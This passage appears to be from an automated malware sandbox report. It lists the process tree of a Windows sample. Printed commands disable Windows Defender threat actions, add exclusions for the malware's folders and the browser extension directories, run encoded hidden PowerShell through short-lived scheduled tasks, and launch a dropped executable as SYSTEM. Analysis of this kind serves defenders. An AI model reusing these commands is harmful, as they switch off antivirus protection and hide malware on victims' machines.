                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:3904
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:424
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1796
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:1924
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:4340
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:4700
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:3948
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:4112
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:3876
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:780
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:1296
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:1080
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:4300
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:2200
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2056
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:3476
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:3588
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                              2⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4376
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2140
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:1908
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:1984
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:2064
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:3592
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2608
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:808
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:1728
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:3084
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2392
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2804
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1376
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3472
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2888
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2324
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:2052
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2436
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:568
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1152
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3612
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:932
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "gfzHvnjxQ" /SC once /ST 06:53:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:1964
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /run /I /tn "gfzHvnjxQ"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2664
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /DELETE /F /TN "gfzHvnjxQ"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3876
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 01:08:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\kMrfIRH.exe\" GH /DqxBdidoS 385118 /S" /V1 /F
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:4408
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3144
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:4484
                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:964
                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4368
                                                                                                                                                                              • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\kMrfIRH.exe
                                                                                                                                                                                C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\kMrfIRH.exe GH /DqxBdidoS 385118 /S
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:1412
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:728
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4504
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2184
                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:3444
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2096
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2140
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1984
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2064
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3592
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:2608
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4652
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4656
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:872
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3580
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:4468
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:4820
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:3628
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3356
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4760
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4724
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1988
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:2564
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
